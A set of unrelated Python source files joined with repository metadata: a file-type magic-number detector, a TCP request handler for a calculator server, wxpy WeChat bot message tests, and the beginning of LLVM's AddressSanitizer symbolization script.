byte-padded'], [0L, 'short', '=', 5120L, 'raw G3 data'], [0L, 'string', '=', 'RMD1', 'raw modem data'], [0L, 'string', '=', 'PVF1\012', 'portable voice format'], [0L, 'string', '=', 'PVF2\012', 'portable voice format'], [0L, 'beshort', '=', 520L, 'mc68k COFF'], [0L, 'beshort', '=', 521L, 'mc68k executable (shared)'], [0L, 'beshort', '=', 522L, 'mc68k executable (shared demand paged)'], [0L, 'beshort', '=', 554L, '68K BCS executable'], [0L, 'beshort', '=', 555L, '88K BCS executable'], [0L, 'string', '=', 'S0', 'Motorola S-Record; binary data in text format'], [0L, 'string', '=', '@echo off', 'MS-DOS batch file text'], [128L, 'string', '=', 'PE\000\000', 'MS Windows PE'], [0L, 'leshort', '=', 332L, 'MS Windows COFF Intel 80386 object file'], [0L, 'leshort', '=', 358L, 'MS Windows COFF MIPS R4000 object file'], [0L, 'leshort', '=', 388L, 'MS Windows COFF Alpha object file'], [0L, 'leshort', '=', 616L, 'MS Windows COFF Motorola 68000 object file'], [0L, 'leshort', '=', 496L, 'MS Windows COFF PowerPC object file'], [0L, 'leshort', '=', 656L, 'MS Windows COFF PA-RISC object file'], [0L, 'string', '=', 'MZ', 'application/x-ms-dos-executable'], [0L, 'string', '=', 'LZ', 'MS-DOS executable (built-in)'], [0L, 'string', '=', 'regf', 'Windows NT Registry file'], [2080L, 'string', '=', 'Microsoft Word 6.0 Document', 'text/vnd.ms-word'], [2080L, 'string', '=', 'Documento Microsoft Word 6', 'text/vnd.ms-word'], [2112L, 'string', '=', 'MSWordDoc', 'text/vnd.ms-word'], [0L, 'belong', '=', 834535424L, 'text/vnd.ms-word'], [0L, 'string', '=', 'PO^Q`', 'text/vnd.ms-word'], [2080L, 'string', '=', 'Microsoft Excel 5.0 Worksheet', 'application/vnd.ms-excel'], [2114L, 'string', '=', 'Biff5', 'application/vnd.ms-excel'], [0L, 'belong', '=', 6656L, 'Lotus 1-2-3'], [0L, 'belong', '=', 512L, 'Lotus 1-2-3'], [1L, 'string', '=', 'WPC', 'text/vnd.wordperfect'], [0L, 'beshort', '=', 610L, 'Tower/XP rel 2 object'], [0L, 'beshort', '=', 615L, 'Tower/XP rel 2 object'], [0L, 'beshort', '=', 620L, 'Tower/XP rel 3 object'], [0L, 'beshort', '=', 625L, 'Tower/XP rel 3 object'], [0L, 'beshort', '=', 630L, 'Tower32/600/400 68020 object'], [0L, 'beshort', '=', 640L, 'Tower32/800 68020'], [0L, 'beshort', '=', 645L, 'Tower32/800 68010'], [0L, 'lelong', '=', 407L, 'NetBSD little-endian object file'], [0L, 'belong', '=', 407L, 'NetBSD big-endian object file'], [0L, 'belong&0377777777', '=', 41400413L, 'NetBSD/i386 demand paged'], [0L, 'belong&0377777777', '=', 41400410L, 'NetBSD/i386 pure'], [0L, 'belong&0377777777', '=', 41400407L, 'NetBSD/i386'], [0L, 'belong&0377777777', '=', 41400507L, 'NetBSD/i386 core'], [0L, 'belong&0377777777', '=', 41600413L, 'NetBSD/m68k demand paged'], [0L, 'belong&0377777777', '=', 41600410L, 'NetBSD/m68k pure'], [0L, 'belong&0377777777', '=', 41600407L, 'NetBSD/m68k'], [0L, 'belong&0377777777', '=', 41600507L, 'NetBSD/m68k core'], [0L, 'belong&0377777777', '=', 42000413L, 'NetBSD/m68k4k demand paged'], [0L, 'belong&0377777777', '=', 42000410L, 'NetBSD/m68k4k pure'], [0L, 'belong&0377777777', '=', 42000407L, 'NetBSD/m68k4k'], [0L, 'belong&0377777777', '=', 42000507L, 'NetBSD/m68k4k core'], [0L, 'belong&0377777777', '=', 42200413L, 'NetBSD/ns32532 demand paged'], [0L, 'belong&0377777777', '=', 42200410L, 'NetBSD/ns32532 pure'], [0L, 'belong&0377777777', '=', 42200407L, 'NetBSD/ns32532'], [0L, 'belong&0377777777', '=', 42200507L, 'NetBSD/ns32532 core'], [0L, 'belong&0377777777', '=', 42400413L, 'NetBSD/sparc demand paged'], [0L, 'belong&0377777777', '=', 42400410L, 'NetBSD/sparc pure'], [0L, 'belong&0377777777', '=', 42400407L, 'NetBSD/sparc'], [0L, 'belong&0377777777', '=', 42400507L, 'NetBSD/sparc core'], [0L, 'belong&0377777777', '=', 42600413L, 'NetBSD/pmax demand paged'], [0L, 'belong&0377777777', '=', 42600410L, 'NetBSD/pmax pure'], [0L, 'belong&0377777777', '=', 42600407L, 'NetBSD/pmax'], [0L, 'belong&0377777777', '=', 42600507L, 'NetBSD/pmax core'], [0L, 'belong&0377777777', '=', 43000413L, 'NetBSD/vax demand paged'], [0L, 'belong&0377777777', '=', 43000410L, 'NetBSD/vax pure'], [0L, 'belong&0377777777', '=', 43000407L, 'NetBSD/vax'], [0L, 'belong&0377777777', '=', 43000507L, 'NetBSD/vax core'], [0L, 'lelong', '=', 459141L, 'ECOFF NetBSD/alpha binary'], [0L, 'belong&0377777777', '=', 43200507L, 'NetBSD/alpha core'], [0L, 'belong&0377777777', '=', 43400413L, 'NetBSD/mips demand paged'], [0L, 'belong&0377777777', '=', 43400410L, 'NetBSD/mips pure'], [0L, 'belong&0377777777', '=', 43400407L, 'NetBSD/mips'], [0L, 'belong&0377777777', '=', 43400507L, 'NetBSD/mips core'], [0L, 'belong&0377777777', '=', 43600413L, 'NetBSD/arm32 demand paged'], [0L, 'belong&0377777777', '=', 43600410L, 'NetBSD/arm32 pure'], [0L, 'belong&0377777777', '=', 43600407L, 'NetBSD/arm32'], [0L, 'belong&0377777777', '=', 43600507L, 'NetBSD/arm32 core'], [0L, 'string', '=', 'StartFontMetrics', 'font/x-sunos-news'], [0L, 'string', '=', 'StartFont', 'font/x-sunos-news'], [0L, 'belong', '=', 326773060L, 'font/x-sunos-news'], [0L, 'belong', '=', 326773063L, 'font/x-sunos-news'], [0L, 'belong', '=', 326773072L, 'font/x-sunos-news'], [0L, 'belong', '=', 326773073L, 'font/x-sunos-news'], [8L, 'belong', '=', 326773573L, 'font/x-sunos-news'], [8L, 'belong', '=', 326773576L, 'font/x-sunos-news'], [0L, 'string', '=', 'Octave-1-L', 'Octave binary data (little endian)'], [0L, 'string', '=', 'Octave-1-B', 'Octave binary data (big endian)'], [0L, 'string', '=', '\177OLF', 'OLF'], [0L, 'beshort', '=', 34765L, 'OS9/6809 module:'], [0L, 'beshort', '=', 19196L, 'OS9/68K module:'], [0L, 'long', '=', 61374L, 'OSF/Rose object'], [0L, 'short', '=', 565L, 'i386 COFF object'], [0L, 'short', '=', 10775L, '"compact bitmap" format (Poskanzer)'], [0L, 'string', '=', '%PDF-', 'PDF document'], [0L, 'lelong', '=', 101555L, 'PDP-11 single precision APL workspace'], [0L, 'lelong', '=', 101554L, 'PDP-11 double precision APL workspace'], [0L, 'leshort', '=', 407L, 'PDP-11 executable'], [0L, 'leshort', '=', 401L, 'PDP-11 UNIX/RT ldp'], [0L, 'leshort', '=', 405L, 'PDP-11 old overlay'], [0L, 'leshort', '=', 410L, 'PDP-11 pure executable'], [0L, 'leshort', '=', 411L, 'PDP-11 separate I&D executable'], [0L, 'leshort', '=', 437L, 'PDP-11 kernel overlay'], [0L, 'beshort', '=', 39168L, 'PGP key public ring'], [0L, 'beshort', '=', 38145L, 'PGP key security ring'], [0L, 'beshort', '=', 38144L, 'PGP key security ring'], [0L, 'beshort', '=', 42496L, 'PGP encrypted data'], [0L, 'string', '=', '-----BEGIN PGP', 'PGP armored data'], [0L, 'string', '=', '# PaCkAgE DaTaStReAm', 'pkg Datastream (SVR4)'], [0L, 'short', '=', 601L, 'mumps avl global'], [0L, 'short', '=', 602L, 'mumps blt global'], [0L, 'string', '=', '%!', 'application/postscript'], [0L, 'string', '=', '\004%!', 'application/postscript'], [0L, 'belong', '=', 3318797254L, 'DOS EPS Binary File'], [0L, 'string', '=', '*PPD-Adobe:', 'PPD file'], [0L, 'string', '=', '\033%-12345X@PJL', 'HP Printer Job Language data'], [0L, 'string', '=', '\033%-12345X@PJL', 'HP Printer Job Language data'], [0L, 'string', '=', '\033E\033', 'image/x-pcl-hp'], [0L, 'string', '=', '@document(', 'Imagen printer'], [0L, 'string', '=', 'Rast', 'RST-format raster font data'], [0L, 'belong&0xff00ffff', '=', 1442840576L, 'ps database'], [0L, 'long', '=', 1351614727L, 'Pyramid 90x family executable'], [0L, 'long', '=', 1351614728L, 'Pyramid 90x family pure executable'], [0L, 'long', '=', 1351614731L, 'Pyramid 90x family demand paged pure executable'], [0L, 'beshort', '=', 60843L, ''], [0L, 'string', '=', '{\\\\rtf', 'Rich Text Format data,'], [38L, 'string', '=', 'Spreadsheet', 'sc spreadsheet file'], [8L, 'string', '=', '\001s SCCS', 'archive data'], [0L, 'byte', '=', 46L, 'Sendmail frozen configuration'], [0L, 'short', '=', 10012L, 'Sendmail frozen configuration'], [0L, 'lelong', '=', 234L, 'BALANCE NS32000 .o'], [0L, 'lelong', '=', 4330L, 'BALANCE NS32000 executable (0 @ 0)'], [0L, 'lelong', '=', 8426L, 'BALANCE NS32000 executable (invalid @ 0)'], [0L, 'lelong', '=', 12522L, 'BALANCE NS32000 standalone executable'], [0L, 'leshort', '=', 4843L, 'SYMMETRY i386 .o'], [0L, 'leshort', '=', 8939L, 'SYMMETRY i386 executable (0 @ 0)'], [0L, 'leshort', '=', 13035L, 'SYMMETRY i386 executable (invalid @ 0)'], [0L, 'leshort', '=', 17131L, 'SYMMETRY i386 standalone executable'], [0L, 'string', '=', 'kbd!map', 'kbd map file'], [0L, 'belong', '=', 407L, 'old SGI 68020 executable'], [0L, 'belong', '=', 410L, 'old SGI 68020 pure executable'], [0L, 'beshort', '=', 34661L, 'disk quotas file'], [0L, 'beshort', '=', 1286L, 'IRIS Showcase file'], [0L, 'beshort', '=', 550L, 'IRIS Showcase template'], [0L, 'belong', '=', 1396917837L, 'IRIS Showcase file'], [0L, 'belong', '=', 1413695053L, 'IRIS Showcase template'], [0L, 'belong', '=', 3735927486L, 'IRIX Parallel Arena'], [0L, 'beshort', '=', 352L, 'MIPSEB COFF executable'], [0L, 'beshort', '=', 354L, 'MIPSEL COFF executable'], [0L, 'beshort', '=', 24577L, 'MIPSEB-LE COFF executable'], [0L, 'beshort', '=', 25089L, 'MIPSEL-LE COFF executable'], [0L, 'beshort', '=', 355L, 'MIPSEB MIPS-II COFF executable'], [0L, 'beshort', '=', 358L, 'MIPSEL MIPS-II COFF executable'], [0L, 'beshort', '=', 25345L, 'MIPSEB-LE MIPS-II COFF executable'], [0L, 'beshort', '=', 26113L, 'MIPSEL-LE MIPS-II COFF executable'], [0L, 'beshort', '=', 320L, 'MIPSEB MIPS-III COFF executable'], [0L, 'beshort', '=', 322L, 'MIPSEL MIPS-III COFF executable'], [0L, 'beshort', '=', 16385L, 'MIPSEB-LE MIPS-III COFF executable'], [0L, 'beshort', '=', 16897L, 'MIPSEL-LE MIPS-III COFF executable'], [0L, 'beshort', '=', 384L, 'MIPSEB Ucode'], [0L, 'beshort', '=', 386L, 'MIPSEL Ucode'], [0L, 'belong', '=', 3735924144L, 'IRIX core dump'], [0L, 'belong', '=', 3735924032L, 'IRIX 64-bit core dump'], [0L, 'belong', '=', 3133063355L, 'IRIX N32 core dump'], [0L, 'string', '=', 'CrshDump', 'IRIX vmcore dump of'], [0L, 'string', '=', 'SGIAUDIT', 'SGI Audit file'], [0L, 'string', '=', 'WNGZWZSC', 'Wingz compiled script'], [0L, 'string', '=', 'WNGZWZSS', 'Wingz spreadsheet'], [0L, 'string', '=', 'WNGZWZHP', 'Wingz help file'], [0L, 'string', '=', '\\#Inventor', 'V IRIS Inventor 1.0 file'], [0L, 'string', '=', '\\#Inventor', 'V2 Open Inventor 2.0 file'], [0L, 'string', '=', 'glfHeadMagic();', 'GLF_TEXT'], [4L, 'belong', '=', 1090584576L, 'GLF_BINARY_LSB_FIRST'], [4L, 'belong', '=', 321L, 'GLF_BINARY_MSB_FIRST'], [0L, 'string', '=', '<!DOCTYPE HTML', 'text/html'], [0L, 'string', '=', '<!doctype html', 'text/html'], [0L, 'string', '=', '<HEAD', 'text/html'], [0L, 'string', '=', '<head', 'text/html'], [0L, 'string', '=', '<TITLE', 'text/html'], [0L, 'string', '=', '<title', 'text/html'], [0L, 'string', '=', '<html', 'text/html'], [0L, 'string', '=', '<HTML', 'text/html'], [0L, 'string', '=', '<?xml', 'application/xml'], [0L, 'string', '=', '<!DOCTYPE', 'exported SGML document text'], [0L, 'string', '=', '<!doctype', 'exported SGML document text'], [0L, 'string', '=', '<!SUBDOC', 'exported SGML subdocument text'], [0L, 'string', '=', '<!subdoc', 'exported SGML subdocument text'], [0L, 'string', '=', '<!--', 'exported SGML document text'], [0L, 'string', '=', 'RTSS', 'NetMon capture file'], [0L, 'string', '=', 'TRSNIFF data \032', 'Sniffer capture file'], [0L, 'string', '=', 'XCP\000', 'NetXRay capture file'], [0L, 'ubelong', '=', 2712847316L, 'tcpdump capture file (big-endian)'], [0L, 'ulelong', '=', 2712847316L, 'tcpdump capture file (little-endian)'], [0L, 'string', '=', '<!SQ DTD>', 'Compiled SGML rules file'], [0L, 'string', '=', '<!SQ A/E>', 'A/E SGML Document binary'], [0L, 'string', '=', '<!SQ STS>', 'A/E SGML binary styles file'], [0L, 'short', '=', 49374L, 'Compiled PSI (v1) data'], [0L, 'short', '=', 49370L, 'Compiled PSI (v2) data'], [0L, 'short', '=', 125252L, 'SoftQuad DESC or font file binary'], [0L, 'string', '=', 'SQ BITMAP1', 'SoftQuad Raster Format text'], [0L, 'string', '=', 'X SoftQuad', 'troff Context intermediate'], [0L, 'belong&077777777', '=', 600413L, 'sparc demand paged'], [0L, 'belong&077777777', '=', 600410L, 'sparc pure'], [0L, 'belong&077777777', '=', 600407L, 'sparc'], [0L, 'belong&077777777', '=', 400413L, 'mc68020 demand paged'], [0L, 'belong&077777777', '=', 400410L, 'mc68020 pure'], [0L, 'belong&077777777', '=', 400407L, 'mc68020'], [0L, 'belong&077777777', '=', 200413L, 'mc68010 demand paged'], [0L, 'belong&077777777', '=', 200410L, 'mc68010 pure'], [0L, 'belong&077777777', '=', 200407L, 'mc68010'], [0L, 'belong', '=', 407L, 'old sun-2 executable'], [0L, 'belong', '=', 410L, 'old sun-2 pure executable'], [0L, 'belong', '=', 413L, 'old sun-2 demand paged executable'], [0L, 'belong', '=', 525398L, 'SunOS core file'], [0L, 'long', '=', 4197695630L, 'SunPC 4.0 Hard Disk'], [0L, 'string', '=', '#SUNPC_CONFIG', 'SunPC 4.0 Properties Values'], [0L, 'string', '=', 'snoop', 'Snoop capture file'], [36L, 'string', '=', 'acsp', 'Kodak Color Management System, ICC Profile'], [0L, 'string', '=', '#!teapot\012xdr', 'teapot work sheet (XDR format)'], [0L, 'string', '=', '\032\001', 'Compiled terminfo entry'], [0L, 'short', '=', 433L, 'Curses screen image'], [0L, 'short', '=', 434L, 'Curses screen image'], [0L, 'string', '=', '\367\002', 'TeX DVI file'], [0L, 'string', '=', '\367\203', 'font/x-tex'], [0L, 'string', '=', '\367Y', 'font/x-tex'], [0L, 'string', '=', '\367\312', 'font/x-tex'], [0L, 'string', '=', 'This is TeX,', 'TeX transcript text'], [0L, 'string', '=', 'This is METAFONT,', 'METAFONT transcript text'], [2L, 'string', '=', '\000\021', 'font/x-tex-tfm'], [2L, 'string', '=', '\000\022', 'font/x-tex-tfm'], [0L, 'string', '=', '\\\\input\\', 'texinfo Texinfo source text'], [0L, 'string', '=', 'This is Info file', 'GNU Info text'], [0L, 'string', '=', '\\\\input', 'TeX document text'], [0L, 'string', '=', '\\\\section', 'LaTeX document text'], [0L, 'string', '=', '\\\\setlength', 'LaTeX document text'], [0L, 'string', '=', '\\\\documentstyle', 'LaTeX document text'], [0L, 'string', '=', '\\\\chapter', 'LaTeX document text'], [0L, 'string', '=', '\\\\documentclass', 'LaTeX 2e document text'], [0L, 'string', '=', '\\\\relax', 'LaTeX auxiliary file'], [0L, 'string', '=', '\\\\contentsline', 'LaTeX table of contents'], [0L, 'string', '=', '\\\\indexentry', 'LaTeX raw index file'], [0L, 'string', '=', '\\\\begin{theindex}', 'LaTeX sorted index'], [0L, 'string', '=', '\\\\glossaryentry', 'LaTeX raw glossary'], [0L, 'string', '=', '\\\\begin{theglossary}', 'LaTeX sorted glossary'], [0L, 'string', '=', 'This is makeindex', 'Makeindex log file'], [0L, 'string', '=', '**TI82**', 'TI-82 Graphing Calculator'], [0L, 'string', '=', '**TI83**', 'TI-83 Graphing Calculator'], [0L, 'string', '=', '**TI85**', 'TI-85 Graphing Calculator'], [0L, 'string', '=', '**TI92**', 'TI-92 Graphing Calculator'], [0L, 'string', '=', '**TI80**', 'TI-80 Graphing Calculator File.'], [0L, 'string', '=', '**TI81**', 'TI-81 Graphing Calculator File.'], [0L, 'string', '=', 'TZif', 'timezone data'], [0L, 'string', '=', '\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\001\000', 'old timezone data'], [0L, 'string', '=', '\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\002\000', 'old timezone data'], [0L, 'string', '=', '\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\003\000', 'old timezone data'], [0L, 'string', '=', '\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\004\000', 'old timezone data'], [0L, 'string', '=', '\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\005\000', 'old timezone data'], [0L, 'string', '=', '\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\006\000', 'old timezone data'], [0L, 'string', '=', '.\\\\"', 'troff or preprocessor input text'], [0L, 'string', '=', '\'\\\\"', 'troff or preprocessor input text'], [0L, 'string', '=', '\'.\\\\"', 'troff or preprocessor input text'], [0L, 'string', '=', '\\\\"', 'troff or preprocessor input text'], [0L, 'string', '=', 'x T', 'ditroff text'], [0L, 'string', '=', '@\357', 'very old (C/A/T) troff output data'], [0L, 'string', '=', 'Interpress/Xerox', 'Xerox InterPress data'], [0L, 'short', '=', 263L, 'unknown machine executable'], [0L, 'short', '=', 264L, 'unknown pure executable'], [0L, 'short', '=', 265L, 'PDP-11 separate I&D'], [0L, 'short', '=', 267L, 'unknown pure executable'], [0L, 'long', '=', 268L, 'unknown demand paged pure executable'], [0L, 'long', '=', 269L, 'unknown demand paged pure executable'], [0L, 'long', '=', 270L, 'unknown readable demand paged pure executable'], [0L, 'string', '=', 'begin uuencoded', 'or xxencoded text'], [0L, 'string', '=', 'xbtoa Begin', "btoa'd text"], [0L, 'string', '=', '$\012ship', "ship'd binary text"], [0L, 'string', '=', 'Decode the following with bdeco', 'bencoded News text'], [11L, 'string', '=', 'must be converted with BinHex', 'BinHex binary text'], [0L, 'short', '=', 610L, 'Perkin-Elmer executable'], [0L, 'beshort', '=', 572L, 'amd 29k coff noprebar executable'], [0L, 'beshort', '=', 1572L, 'amd 29k coff prebar executable'], [0L, 'beshort', '=', 160007L, 'amd 29k coff archive'], [6L, 'beshort', '=', 407L, 'unicos (cray) executable'], [596L, 'string', '=', 'X\337\377\377', 'Ultrix core file'], [0L, 'string', '=', 'Joy!peffpwpc', 'header for PowerPC PEF executable'], [0L, 'lelong', '=', 101557L, 'VAX single precision APL workspace'], [0L, 'lelong', '=', 101556L, 'VAX double precision APL workspace'], [0L, 'lelong', '=', 407L, 'VAX executable'], [0L, 'lelong', '=', 410L, 'VAX pure executable'], [0L, 'lelong', '=', 413L, 'VAX demand paged pure executable'], [0L, 'leshort', '=', 570L, 'VAX COFF executable'], [0L, 'leshort', '=', 575L, 'VAX COFF pure executable'], [0L, 'string', '=', 'LBLSIZE=', 'VICAR image data'], [43L, 'string', '=', 'SFDU_LABEL', 'VICAR label file'], [0L, 'short', '=', 21845L, 'VISX image file'], [0L, 'string', '=', '\260\0000\000', 'VMS VAX executable'], [0L, 'belong', '=', 50331648L, 'VMS Alpha executable'], [1L, 'string', '=', 'WPC', '(Corel/WP)'], [0L, 'string', '=', 'core', 'core file (Xenix)'], [0L, 'byte', '=', 128L, '8086 relocatable (Microsoft)'], [0L, 'leshort', '=', 65381L, 'x.out'], [0L, 'leshort', '=', 518L, 'Microsoft a.out'], [0L, 'leshort', '=', 320L, 'old Microsoft 8086 x.out'], [0L, 'lelong', '=', 518L, 'b.out'], [0L, 'leshort', '=', 1408L, 'XENIX 8086 relocatable or 80286 small model'], [0L, 'long', '=', 59399L, 'object file (z8000 a.out)'], [0L, 'long', '=', 59400L, 'pure object file (z8000 a.out)'], [0L, 'long', '=', 59401L, 'separate object file (z8000 a.out)'], [0L, 'long', '=', 59397L, 'overlay object file (z8000 a.out)'], [0L, 'string', '=', 'ZyXEL\002', 'ZyXEL voice data'], ] magic_tests = [] for record in magic_database: magic_tests.append(MagicTest(record[0], record[1], record[2], record[3], record[4])) def guess_type(filename): """ Guess the mimetype of a file based on its filename. @param filename: File name. @return: Mimetype string or description, when appropriate mime not available. """ if not os.path.isfile(filename): logging.debug('%s is not a file', filename) return None try: data = open(filename, 'r').read(8192) except Exception, e: logging.error(str(e)) return None for test in magic_tests: type = test.compare(data) if type: return type # No matching magic number in the database. is it binary or text? for c in data: if ord(c) > 128: # Non ASCII (binary) data return 'Data' # ASCII, do some text tests if string.find('The', data, 0, 8192) > -1: return 'English text' if string.find('def', data, 0, 8192) > -1: return 'Python Source' return 'ASCII text' if __name__ == '__main__': parser = optparse.OptionParser("usage: %prog [options] [filenames]") options, args = parser.parse_args() logging_manager.configure_logging(MagicLoggingConfig(), verbose=True) if not args: parser.print_help() sys.exit(1) for arg in args: msg = None if os.path.isfile(arg): msg = guess_type(arg) if msg: logging.info('%s: %s', arg, msg) else: logging.info('%s: unknown', arg)
gpl-2.0
-6,769,077,660,113,957,000
53.685634
163
0.562151
false
lauromoraes/redes
MyTCPRequestHandler.py
1
1443
import logging import socket import threading import SocketServer import time from recvall import * from calc import * logging.basicConfig( level = logging.DEBUG, format = "%(name)s: %(message)s", ) class MyTCPRequestHandler(SocketServer.BaseRequestHandler): def __init__(self, request, client_address, server): self.logger = logging.getLogger('MyTCPRequestHandler') self.logger.debug('__init__') SocketServer.BaseRequestHandler.__init__(self, request, client_address, server) return def setup(self): self.logger.debug('setup') return SocketServer.BaseRequestHandler.setup(self) def handle(self): self.logger.debug('handle') data = recvall(self.request, 2) #print(self.request.accept()[1]) #current_thread = threading.currentThread() #resp = "%s, %s" % (current_thread.getName(), data) #self.logger.debug('Thread: %s | recv()->"%s"', current_thread.getName(), data) #self.logger.debug('Threads: %s' % str( [ t.getName() for t in threading.enumerate()] ) ) resp = calc(data) sent = 0 size = 1024*5 while(sent < len(resp)): if(sent+size <= len(resp)): sent += self.request.send(resp[sent:sent+size]) else: sent += self.request.send(resp[sent:]) time.sleep(0.1) #self.request.sendall("data") self.request.shutdown(socket.SHUT_WR) self.request.close() #time.sleep(3) return def finish(self): self.logger.debug('finish') return SocketServer.BaseRequestHandler.finish(self)
gpl-2.0
-1,314,863,412,308,185,900
29.0625
91
0.699931
false
youfou/wxpy
tests/api/messages/test_message.py
1
2800
from datetime import datetime from tests.conftest import wait_for_message from wxpy import * def sent_message(sent_msg, msg_type, receiver): assert isinstance(sent_msg, SentMessage) assert sent_msg.type == msg_type assert sent_msg.receiver == receiver assert sent_msg.bot == receiver.bot assert sent_msg.sender == receiver.bot.self assert isinstance(sent_msg.receive_time, datetime) assert isinstance(sent_msg.create_time, datetime) assert sent_msg.create_time < sent_msg.receive_time class TestMessage: def test_text_message(self, group, friend): sent_message(group.send('text'), TEXT, group) msg = wait_for_message(group, TEXT) assert isinstance(msg, Message) assert msg.type == TEXT assert msg.text == 'Hello!' assert not msg.is_at assert msg.chat == group assert msg.sender == group assert msg.receiver == group.self assert msg.member == friend assert 0 < msg.latency < 30 group.send('at') msg = wait_for_message(group, TEXT) assert msg.is_at def test_picture_message(self, group, image_path): sent = group.send_image(image_path) sent_message(sent, PICTURE, group) assert sent.path == image_path def test_video_message(self, group, video_path): sent = group.send_video(video_path) sent_message(sent, VIDEO, group) assert sent.path == video_path def test_raw_message(self, group): # 发送名片 raw_type = 42 raw_content = '<msg username="{}" nickname="{}"/>'.format('wxpy_bot', 'wxpy 机器人') sent_message(group.send_raw_msg(raw_type, raw_content), None, group) def test_send(self, friend, file_path, image_path, video_path): text_to_send = 'test sending text' sent = friend.send(text_to_send) sent_message(sent, TEXT, friend) assert sent.text == text_to_send sent = friend.send('@fil@{}'.format(file_path)) sent_message(sent, ATTACHMENT, friend) assert sent.path == file_path sent = friend.send('@img@{}'.format(image_path)) sent_message(sent, PICTURE, friend) assert sent.path == image_path sent = friend.send('@vid@{}'.format(video_path)) sent_message(sent, VIDEO, friend) assert sent.path == video_path # 发送名片 raw_type = 42 raw_content = '<msg username="{}" nickname="{}"/>'.format('wxpy_bot', 'wxpy 机器人') uri = '/webwxsendmsg' sent = friend.send_raw_msg(raw_type, raw_content) sent_message(sent, None, friend) assert sent.type is None assert sent.raw_type == raw_type assert sent.raw_content == raw_content assert sent.uri == uri
mit
-5,514,851,197,585,937,000
33.65
89
0.618326
false
ensemblr/llvm-project-boilerplate
include/llvm/projects/compiler-rt/lib/asan/scripts/asan_symbolize.py
1
18097
#!/usr/bin/env python #===- lib/asan/scripts/asan_symbolize.py -----------------------------------===# # # The LLVM Compiler Infrastructure # # This file is distributed under the University of Illinois Open Source # License. See LICENSE.TXT for details. # #===------------------------------------------------------------------------===# import argparse import bisect import getopt import os import re import subprocess import sys symbolizers = {} DEBUG = False demangle = False binutils_prefix = None sysroot_path = None binary_name_filter = None fix_filename_patterns = None logfile = sys.stdin allow_system_symbolizer = True force_system_symbolizer = False # FIXME: merge the code that calls fix_filename(). def fix_filename(file_name): if fix_filename_patterns: for path_to_cut in fix_filename_patterns: file_name = re.sub('.*' + path_to_cut, '', file_name) file_name = re.sub('.*asan_[a-z_]*.cc:[0-9]*', '_asan_rtl_', file_name) file_name = re.sub('.*crtstuff.c:0', '???:0', file_name) return file_name def sysroot_path_filter(binary_name): return sysroot_path + binary_name def is_valid_arch(s): return s in ["i386", "x86_64", "x86_64h", "arm", "armv6", "armv7", "armv7s", "armv7k", "arm64", "powerpc64", "powerpc64le", "s390x", "s390"] def guess_arch(addr): # Guess which arch we're running. 10 = len('0x') + 8 hex digits. if len(addr) > 10: return 'x86_64' else: return 'i386' class Symbolizer(object): def __init__(self): pass def symbolize(self, addr, binary, offset): """Symbolize the given address (pair of binary and offset). Overriden in subclasses. Args: addr: virtual address of an instruction. binary: path to executable/shared object containing this instruction. offset: instruction offset in the @binary. Returns: list of strings (one string for each inlined frame) describing the code locations for this instruction (that is, function name, file name, line and column numbers). """ return None class LLVMSymbolizer(Symbolizer): def __init__(self, symbolizer_path, default_arch, system, dsym_hints=[]): super(LLVMSymbolizer, self).__init__() self.symbolizer_path = symbolizer_path self.default_arch = default_arch self.system = system self.dsym_hints = dsym_hints self.pipe = self.open_llvm_symbolizer() def open_llvm_symbolizer(self): cmd = [self.symbolizer_path, '--use-symbol-table=true', '--demangle=%s' % demangle, '--functions=linkage', '--inlining=true', '--default-arch=%s' % self.default_arch] if self.system == 'Darwin': for hint in self.dsym_hints: cmd.append('--dsym-hint=%s' % hint) if DEBUG: print ' '.join(cmd) try: result = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE) except OSError: result = None return result def symbolize(self, addr, binary, offset): """Overrides Symbolizer.symbolize.""" if not self.pipe: return None result = [] try: symbolizer_input = '"%s" %s' % (binary, offset) if DEBUG: print symbolizer_input print >> self.pipe.stdin, symbolizer_input while True: function_name = self.pipe.stdout.readline().rstrip() if not function_name: break file_name = self.pipe.stdout.readline().rstrip() file_name = fix_filename(file_name) if (not function_name.startswith('??') or not file_name.startswith('??')): # Append only non-trivial frames. result.append('%s in %s %s' % (addr, function_name, file_name)) except Exception: result = [] if not result: result = None return result def LLVMSymbolizerFactory(system, default_arch, dsym_hints=[]): symbolizer_path = os.getenv('LLVM_SYMBOLIZER_PATH') if not symbolizer_path: symbolizer_path = os.getenv('ASAN_SYMBOLIZER_PATH') if not symbolizer_path: # Assume llvm-symbolizer is in PATH. symbolizer_path = 'llvm-symbolizer' return LLVMSymbolizer(symbolizer_path, default_arch, system, dsym_hints) class Addr2LineSymbolizer(Symbolizer): def __init__(self, binary): super(Addr2LineSymbolizer, self).__init__() self.binary = binary self.pipe = self.open_addr2line() self.output_terminator = -1 def open_addr2line(self): addr2line_tool = 'addr2line' if binutils_prefix: addr2line_tool = binutils_prefix + addr2line_tool cmd = [addr2line_tool, '-fi'] if demangle: cmd += ['--demangle'] cmd += ['-e', self.binary] if DEBUG: print ' '.join(cmd) return subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE) def symbolize(self, addr, binary, offset): """Overrides Symbolizer.symbolize.""" if self.binary != binary: return None lines = [] try: print >> self.pipe.stdin, offset print >> self.pipe.stdin, self.output_terminator is_first_frame = True while True: function_name = self.pipe.stdout.readline().rstrip() file_name = self.pipe.stdout.readline().rstrip() if is_first_frame: is_first_frame = False elif function_name in ['', '??']: assert file_name == function_name break lines.append((function_name, file_name)); except Exception: lines.append(('??', '??:0')) return ['%s in %s %s' % (addr, function, fix_filename(file)) for (function, file) in lines] class UnbufferedLineConverter(object): """ Wrap a child process that responds to each line of input with one line of output. Uses pty to trick the child into providing unbuffered output. """ def __init__(self, args, close_stderr=False): # Local imports so that the script can start on Windows. import pty import termios pid, fd = pty.fork() if pid == 0: # We're the child. Transfer control to command. if close_stderr: dev_null = os.open('/dev/null', 0) os.dup2(dev_null, 2) 